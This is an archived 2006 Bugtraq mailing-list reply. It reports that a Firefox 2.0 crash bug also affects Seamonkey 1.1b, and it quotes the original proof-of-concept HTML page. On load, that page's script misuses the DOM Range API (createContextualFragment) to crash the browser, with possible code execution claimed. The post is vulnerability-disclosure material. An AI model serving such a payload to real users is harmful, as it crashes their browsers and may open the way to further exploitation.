| To: | bugtraq@securityfocus.com |
|---|---|
| Subject: | Re: New Flaw in Firefox 2.0: DoS and possible remote code execution |
| From: | sflist@gmx.de |
| Date: | Mon, 27 Nov 2006 08:43:04 +0100 |
| Delivered-to: | sp-com-lists@consult.net |
| Delivered-to: | bugtraq-list@securepoint.com |
| Delivered-to: | mailing list bugtraq@securityfocus.com |
| Delivered-to: | moderator for bugtraq@securityfocus.com |
| List-help: | <mailto:bugtraq-help@securityfocus.com> |
| List-id: | <bugtraq.list-id.securityfocus.com> |
| List-post: | <mailto:bugtraq@securityfocus.com> |
| List-subscribe: | <mailto:bugtraq-subscribe@securityfocus.com> |
| List-unsubscribe: | <mailto:bugtraq-unsubscribe@securityfocus.com> |
| Mailing-list: | contact bugtraq-help@securityfocus.com; run by ezmlm |
Also crashes Seamonkey 1.1b on Suse 10.1 > > > New Flaw in Firefox 2.0: DoS and possible remote code execution > > PoC here: http://werterxyz.altervista.org/Firefox2Range.htm > > <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> > <head> <script type="text/javascript"> function do_crash() { var > range; > > range = document.createRange(); > range.selectNode(document.firstChild); > range.createContextualFragment('<span></span>'); > } > </script> > </head> > <body onload="do_crash()"> > <p>Good bye Firefox!</p> > </body> > </html> > -- "Ein Herz für Kinder" - Ihre Spende hilft! Aktion: www.deutschlandsegelt.de Unser Dankeschön: Ihr Name auf dem Segel der 1. deutschen America's Cup-Yacht! |
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | [ GLSA 200611-21 ] Kile: Incorrect backup file permission, Sune Kloppenborg Jeppesen |
|---|---|
| Next by Date: | RE: Cracking String Encryption in Java Obfuscated Bytecode, Jeremy Epstein |
| Previous by Thread: | [ GLSA 200611-21 ] Kile: Incorrect backup file permission, Sune Kloppenborg Jeppesen |
| Next by Thread: | 2nd European Conference on Computer Network Defense (EC2ND), Blyth A J C (AT) |
| Indexes: | [Date] [Thread] [Top] [All Lists] |